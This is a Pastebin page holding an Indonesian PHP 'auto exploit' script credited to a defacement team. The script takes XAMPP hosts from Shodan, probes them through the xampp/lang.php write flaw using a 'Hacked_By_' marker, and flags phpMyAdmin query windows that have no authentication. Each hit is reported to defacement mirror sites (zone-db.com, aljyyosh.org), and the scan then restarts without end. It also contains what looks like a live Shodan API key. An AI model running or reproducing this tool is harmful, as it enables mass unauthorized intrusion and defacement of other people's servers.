API tools faq
paste
Advertisement
shor7cut

Auto Exploit : Lang dan Phpmyadmin [Final]

shor7cut
Jul 26th, 2015
899
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.47 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. error_reporting(0);
  3. set_time_limit(0);
  4. date_default_timezone_set('asia/jakarta');
  5. shor7cut_scanner();
  6.  
  7. /* ------- FUNGSI AMBIL DATA TARGET DAN EKSEKUSI -----*/
  8. function shor7cut_scanner(){
  9. /* ------- CONFIG -----*/
  10. $api_key="z3cBefrV3bmRx2rNZ0E1opuZxXNPrbIR";
  11. $nama_hacker="Shor7cut";
  12. $nama_team="IndoXploit";
  13. $nama_file_target = "target-bu7sec.txt";
  14. $nama_laporan="Laporan.txt";
  15. unlink($nama_file_target);
  16. $nama_ouput_result_xampp="BUG7SEC-XAMPP.HTML"; // Gunakan TYPE FILE (*.HTML)
  17. $nama_ouput_result_phpmyadmin="BUG7SEC-PHPMYD.HTML"; // Gunakan TYPE FILE (*.HTML)
  18. $nama_log_xampp_lang="xampp.log7sec"; // AGAR TIDAK MENYIMPAN DATA YANG SAMA // gunakan .log7sec saja
  19. $nama_log_xampp_phpmyadmin="phpmyadmin.log7sec"; // AGAR TIDAK MENYIMPAN DATA YANG SAMA // gunakan .log7sec saja
  20. $conf_irm = "TRUE"; // TRUE or FALSE (Jika Sudah diisi semua conf , silahkan ganti menjadi TRUE)
  21. $versi_php = phpversion();
  22. $no=1;
  23. $no_target=1;
  24. $total_target=0;
  25. $total_xampp_vuln=0;
  26. $total_phpmyadmin_vuln=0;
  27. $waktu_start=date("d-m-Y h:i:sa");
  28. /* ------- CONFIG:END -----*/
  29. $logos.="\r\n------------------------------------------------------------\r\n";
  30. $logos.=" _________.__ _________ __ \r\n";
  31. $logos.=" / _____/| |__ __________\______ \ ____ __ ___/ |_ \r\n";
  32. $logos.=" \_____ \ | | \ / _ \_ __ \ / // ___\| | \ __\ \r\n";
  33. $logos.=" / \| Y ( <_> ) | \/ / /\ \___| | /| | \r\n";
  34. $logos.=" /_______ /|___| /\____/|__| /____/ \___ >____/ |__| \r\n";
  35. $logos.=" \/ \/ [ MULTY K.I.L.L.E.R ] \/ \r\n";
  36. $logos.="-------------------------------------------------------------\r\n";
  37. echo $logos;
  38. if($conf_irm=="FALSE"){
  39. echo "[PERINGATAN] -> Ops.. Config error\r\n";
  40. exit();
  41. }
  42. if($versi_php<="5.3.0"){
  43. echo "Ops... Silahkan Upgrade versi PHP anda.\r\n";
  44. exit();
  45. }
  46.  
  47. $dork = array (
  48. 'xampp',
  49. 'xampp Apache/2.2.3',
  50. 'xampp Apache/2.2.4',
  51. 'xampp Apache/2.2.6',
  52. 'xampp Apache/2.2.8',
  53. 'xampp Apache/2.2.9',
  54. 'xampp Apache/2.2.11',
  55. 'xampp Apache/2.2.12',
  56. 'xampp Apache/2.2.14',
  57. 'xampp Apache/2.2.17',
  58. 'xampp Apache/2.2.21',
  59. 'xampp Apache/2.4.2',
  60. 'xampp Apache/2.4.3',
  61. 'xampp Apache/2.4.10',
  62. 'xampp Apache/2.4.12',
  63. 'xampp PHP/5.2.1',
  64. 'xampp PHP/5.2.2',
  65. 'xampp PHP/5.2.3',
  66. 'xampp PHP/5.2.4',
  67. 'xampp PHP/5.2.5',
  68. 'xampp PHP/5.2.6',
  69. 'xampp PHP/5.2.8',
  70. 'xampp PHP/5.2.9',
  71. 'xampp PHP/5.3.0',
  72. 'xampp PHP/5.3.1',
  73. 'xampp PHP/5.3.5',
  74. 'xampp PHP/5.3.8',
  75. 'xampp PHP/5.4.4',
  76. 'xampp PHP/5.4.7',
  77. 'xampp PHP/5.4.31',
  78. 'xampp PHP/5.5.15',
  79. 'xampp PHP/5.5.19',
  80. 'xampp PHP/5.6.3',
  81. 'xampp PHP/5.5.24',
  82. 'xampp PHP/5.6.8',
  83. 'xampp PHP/4.4.5',
  84. 'xampp PHP/4.4.6',
  85. 'xampp PHP/4.4.7',
  86. 'xampp PHP/4.4.8',
  87. 'xampp PHP/4.4.9'
  88. ); $total_dork = count($dork);
  89. echo proses("halaman_depan");
  90. $get = file_get_contents("https://api.shodan.io/account/profile?key={$api_key}");
  91. $json = json_decode($get,true);
  92. echo proses("halaman_info");
  93. $status_akun .="--------------------------------\r\n";
  94. $status_akun .="-> Nama : ".$json['display_name']."\r\n";
  95. $status_akun .="-> SALDO : ".$json['credits']."\r\n";
  96. $status_akun .="-> INFO : ".count($dork)." DORK\r\n";
  97. $status_akun .="--------------------------------\r\n";
  98. echo $status_akun;
  99. echo proses("mencari_target");
  100. /* MENCARI TARGET DAN MENYIMPAN TARGET*/
  101. foreach ($dork as $dorks) {
  102. $get = file_get_contents("https://api.shodan.io/shodan/host/search?key={$api_key}&query={$dorks}");
  103. $json = json_decode($get,true);
  104. $target_live = $json['total'];
  105. foreach ($json['matches'] as $key => $value) {
  106.  
  107. $fp = fopen($nama_file_target, 'a+');
  108. fwrite($fp, $value['ip_str']."|");
  109. fclose($fp);
  110.  
  111. }
  112. if($target_live>100){
  113. $target_live=100;
  114. }
  115. $total_target=$target_live+$total_target;
  116. echo "[CARI TARGET] -> $no of $total_dork [Live Target : $target_live | Total Target : $total_target]\r\n";
  117. $no++;
  118. }
  119. echo "[INFO] Total Target : $total_target\r\n";
  120. /* MENGEKSEKUSI TARGET*/
  121. echo proses("loading_target");
  122. $buka_file = fopen($nama_file_target, "r");
  123. $baca_file = fgets($buka_file);
  124. $target = explode("|", $baca_file);
  125. echo proses("loading_eksekusi");
  126. foreach ($target as $sites) {
  127. $format_url_1 = "$sites/xampp/lang.php?Hacked_By_$nama_hacker";
  128. $format_url_2 = "$sites/security/lang.php?Hacked_By_$nama_hacker";
  129. $patch_result1 = "$sites/xampp/lang.tmp?";
  130. $patch_result2 = "$sites/security/lang.tmp?";
  131. $phpmyadmin_url = "$sites/phpmyadmin/querywindow.php";
  132.  
  133. $curl_xampp_1 = curl_init($format_url_1);
  134. curl_setopt($curl_xampp_1, CURLOPT_FAILONERROR, true);
  135. curl_setopt($curl_xampp_1, CURLOPT_FOLLOWLOCATION, true);
  136. curl_setopt($curl_xampp_1, CURLOPT_RETURNTRANSFER, true);
  137. curl_setopt($curl_xampp_1, CURLOPT_CONNECTTIMEOUT ,0);
  138. curl_setopt($curl_xampp_1, CURLOPT_TIMEOUT, 30);
  139. $result_xampp_1 = curl_exec($curl_xampp_1);
  140.  
  141. $curl_xampp_2 = curl_init($format_url_1);
  142. curl_setopt($curl_xampp_2, CURLOPT_FAILONERROR, true);
  143. curl_setopt($curl_xampp_2, CURLOPT_FOLLOWLOCATION, true);
  144. curl_setopt($curl_xampp_2, CURLOPT_RETURNTRANSFER, true);
  145. curl_setopt($curl_xampp_2, CURLOPT_CONNECTTIMEOUT ,0);
  146. curl_setopt($curl_xampp_2, CURLOPT_TIMEOUT, 30);
  147. $result_xampp_2 = curl_exec($curl_xampp_2);
  148.  
  149.  
  150. $phpmyn = curl_init("$phpmyadmin_url");
  151. curl_setopt($phpmyn, CURLOPT_FAILONERROR, true);
  152. curl_setopt($phpmyn, CURLOPT_FOLLOWLOCATION, true);
  153. curl_setopt($phpmyn, CURLOPT_RETURNTRANSFER, true);
  154. curl_setopt($phpmyn, CURLOPT_CONNECTTIMEOUT ,0);
  155. curl_setopt($phpmyn, CURLOPT_TIMEOUT, 30);
  156. $phpmynresult = curl_exec($phpmyn);
  157.  
  158.  
  159.  
  160. echo "[Scan Target]-> TARGET : $sites <$no_target/$total_target>\r\n";
  161. if(eregi("Hacked_By_",$result_xampp_1))
  162. {
  163. echo "[Scan Target]-> XAMPP : vulnerability | xampp/lang.tmp\r\n";
  164. echo $phpmyadmin_status;
  165. echo "[Scan Target]-> MIRROR : ".submit_mirror($patch_result1,$nama_hacker,$nama_team);
  166. echo "[Scan Target]-> Database : ".simpan_result_xampp($patch_result2,$nama_ouput_result_xampp,$nama_log_xampp_lang);
  167. $total_xampp_vuln++;
  168. }
  169. else if(eregi("Hacked_By_",$result_xampp_2))
  170. {
  171. echo "[Scan Target]-> XAMPP : vulnerability | security/lang.tmp\r\n";
  172. echo $phpmyadmin_status;
  173. echo "[Scan Target]-> MIRROR : ".submit_mirror($patch_result2,$nama_hacker,$nama_team);
  174. echo "[Scan Target]-> Database : ".simpan_result_xampp($patch_result2,$nama_ouput_result_xampp,$nama_log_xampp_lang);
  175. $total_xampp_vuln++;
  176. }else {
  177. echo $phpmyadmin_status;
  178. echo "[Scan Target]-> XAMPP : Not vulnerability\r\n";
  179. }
  180.  
  181. $re = "/<input type=\"hidden\" name=\"token\" value=\"(.*)\"/";
  182. if(preg_match($re, $phpmynresult, $matches)){
  183. if(preg_match_all("/pma_password/", $phpmynresult, $matx)){
  184. echo "[Scan Target]->PhpMyadmin : Not vulnerable (Auth)\r\n\n";
  185. }else {
  186. echo "[Scan Target]->PhpMyadmin : vulnerable\r\n";
  187. echo "[Scan Target]->PhpMyadminDB : ".simpan_result_phpmyadmin($phpmyadmin_url,$nama_ouput_result_phpmyadmin,$nama_log_xampp_phpmyadmin);
  188. $total_phpmyadmin_vuln++;
  189. }
  190. }else {
  191. echo "[Scan Target]->PhpMyadmin : Not vulnerable\r\n\n";
  192. }
  193.  
  194.  
  195. flush();
  196. ob_flush();
  197. sleep(2);
  198. $no_target++;
  199. }
  200.  
  201. $lapor.="\r\n\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n";
  202. $lapor.="-> SCAN START - END : ".$waktu_start."/".date("d-m-Y h:i:sa")."\r\n";
  203. $lapor.="-> Total Target : ".$total_target."\r\n";
  204. $lapor.="-> Total Xampp Vuln : ".$total_xampp_vuln."\r\n";
  205. $lapor.="-> Total PHPMYADMIN Vuln : ".$total_phpmyadmin_vuln."\r\n";
  206. $lapor.="\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n";
  207. $fp = fopen($nama_laporan, 'a+');
  208. fwrite($fp, $lapor);
  209. fclose($fp);
  210.  
  211. reload(); // reload senjata
  212.  
  213. } /* AKHIR FUNGSI*/
  214. function reload(){
  215. shor7cut_scanner();
  216. }
  217.  
  218.  
  219. function submit_mirror($sites,$nama_hacker,$nama_team){
  220. $url = "http://$sites";
  221. $post = array(
  222. "hacker" => "$nama_hacker",
  223. "team" => "$nama_team",
  224. "url" => "$url",
  225. "poc" => "Other Web Application Bug",
  226. "key" => "kucing",
  227. "secret" => "tai",
  228. );
  229. $cubits = curl_init ("http://zone-db.com/notify_act.php");
  230. curl_setopt($cubits, CURLOPT_HEADER, 1);
  231. curl_setopt($cubits, CURLOPT_FOLLOWLOCATION, 1);
  232. curl_setopt($cubits, CURLOPT_RETURNTRANSFER, 1);
  233. curl_setopt($cubits, CURLOPT_SSL_VERIFYPEER, 0);
  234. curl_setopt($cubits, CURLOPT_SSL_VERIFYHOST, 0);
  235. curl_setopt($cubits,CURLOPT_TIMEOUT,10);
  236. curl_setopt($cubits,CURLOPT_USERAGENT, "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16");
  237. curl_setopt($cubits, CURLOPT_AUTOREFERER, true);
  238. curl_setopt($cubits, CURLOPT_COOKIEJAR, "coker_log");
  239. curl_setopt($cubits, CURLOPT_COOKIEFILE, "coker_log");
  240. $result_mirror = curl_exec($cubits);
  241.  
  242. if (preg_match("#added#is", $result_mirror)){
  243. $status_zonedb.= "Zone-DB [OK] | ";
  244. }else{
  245. $status_zonedb.= "Zone-DB [FAIL] | ";
  246. }
  247. $cubit = curl_init ();
  248. curl_setopt ($cubit, CURLOPT_RETURNTRANSFER, 1);
  249. curl_setopt ($cubit, CURLOPT_POST, 1);
  250. curl_setopt ($cubit, CURLOPT_URL, "http://aljyyosh.org/single.php");
  251. curl_setopt ($cubit, CURLOPT_COOKIE, "alj=aljyyosh");
  252. curl_setopt ($cubit, CURLOPT_POSTFIELDS, "hacker=$nama_hacker&site=$url&how=1&why=1&addsite=Send");
  253. if (preg_match ("/<font color=red> OK<\/font>/", curl_exec ($cubit))){
  254. $status_zonedb.= "Aljyyosh [OK]\r\n";
  255. }else {
  256. $status_zonedb.= "Aljyyosh [Fail]\r\n";
  257. }
  258. return $status_zonedb;
  259. }
  260.  
  261. function simpan_result_xampp($sites,$nama_ouput_result_xampp,$nama_log_xampp_lang){
  262. $buka_log_xampp = file_get_contents($nama_log_xampp_lang);
  263. $hasil = '<a href="http://'.$sites.'" target="_blank">'.$sites.'</a><br>';
  264. $hasil_log = "http://".$sites."\r\n";
  265. if(!eregi($sites, $buka_log_xampp)){
  266. // simpan hasil result
  267. $fp = fopen($nama_ouput_result_xampp, 'a+');
  268. fwrite($fp, $hasil);
  269. fclose($fp);
  270. // simpan hasil ke log
  271. $fp = fopen($nama_log_xampp_lang, 'a+');
  272. fwrite($fp, $hasil_log);
  273. fclose($fp);
  274. $status_simpan.="Telah Disimpan\r\n";
  275. }else {
  276. $status_simpan="Tidak Tersimpan\r\n";
  277. }
  278. return $status_simpan;
  279. }
  280.  
  281. function simpan_result_phpmyadmin($sites,$nama_ouput_result_phpmyadmin,$nama_log_xampp_phpmyadmin){
  282. $buka_log_xampp = file_get_contents($nama_log_xampp_phpmyadmin);
  283. $hasil = '<a href="http://'.$sites.'" target="_blank">'.$sites.'</a><br>';
  284. $hasil_log = "http://".$sites."\r\n";
  285. if(!eregi($sites, $buka_log_xampp)){
  286. // simpan hasil result
  287. $fp = fopen($nama_ouput_result_phpmyadmin, 'a+');
  288. fwrite($fp, $hasil);
  289. fclose($fp);
  290. // simpan hasil ke log
  291. $fp = fopen($nama_log_xampp_phpmyadmin, 'a+');
  292. fwrite($fp, $hasil_log);
  293. fclose($fp);
  294. $status_simpan="Telah Disimpan\r\n\n";
  295. }else {
  296. $status_simpan="Tidak Tersimpan\r\n\n";
  297. }
  298. return $status_simpan;
  299. }
  300.  
  301.  
  302. function proses($status){
  303. switch ($status) {
  304. case 'mencari_target':
  305. echo "INFO-> Mencari Target ";
  306. for ($i=0; $i <3; $i++) {
  307. echo ".";
  308. sleep(1);
  309. }
  310. echo "\r\n\n";
  311. break;
  312. case 'halaman_depan':
  313. echo "INFO-> Mohon menunggu ";
  314. for ($i=0; $i <3; $i++) {
  315. echo ".";
  316. sleep(1);
  317. }
  318. echo "\r\n";
  319. break;
  320.  
  321. case 'halaman_info':
  322. echo "INFO-> Mengambil data API ";
  323. for ($i=0; $i <3; $i++) {
  324. echo ".";
  325. sleep(1);
  326. }
  327. echo "\r\n";
  328. break;
  329.  
  330. case 'loading_target':
  331. echo "INFO-> Memuat Target ";
  332. for ($i=0; $i <3; $i++) {
  333. echo ".";
  334. sleep(1);
  335. }
  336. echo "\r\n";
  337. break;
  338.  
  339. case 'loading_eksekusi':
  340. echo "INFO-> Mulai mengeksekusi Target ";
  341. for ($i=0; $i <3; $i++) {
  342. echo ".";
  343. sleep(1);
  344. }
  345. echo "\r\n\n";
  346. break;
  347.  
  348.  
  349. default:
  350. # code...
  351. break;
  352. }
  353. }
  354.  
  355. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!